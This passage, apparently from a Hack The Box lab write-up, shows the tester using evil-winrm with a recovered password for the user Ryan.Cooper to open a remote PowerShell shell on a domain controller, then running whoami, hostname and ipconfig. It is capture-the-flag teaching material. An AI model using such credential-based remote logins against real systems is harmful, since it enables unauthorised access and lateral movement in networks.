Ryan.Cooper


With the validated credential for the `Ryan.Cooper` user, I can establish a PowerShell session using evil-winrm:

```
┌──(kali㉿kali)-[~/archive/htb/labs/escape]
└─$ evil-winrm -i $IP -u Ryan.Cooper -p 'NuclearMosquito3'

Evil-WinRM shell v3.5

warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\Ryan.Cooper\Documents> whoami
sequel\ryan.cooper
*evil-winrm* ps c:\Users\Ryan.Cooper\Documents> hostname
dc
*evil-winrm* ps c:\Users\Ryan.Cooper\Documents> ipconfig

Windows IP Configuration


ethernet adapter ethernet0 2:

   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::21c
   ipv6 address. . . . . . . . . . . : dead:beef::31e1:eb54:2784:d5cd
   link-local ipv6 address . . . . . : fe80::31e1:eb54:2784:d5cd%4
   ipv4 address. . . . . . . . . . . : 10.10.11.202
   subnet mask . . . . . . . . . . . : 255.255.254.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:f330%4
                                       10.10.10.2
```
Lateral movement made to the `ryan.cooper` user via WinRM.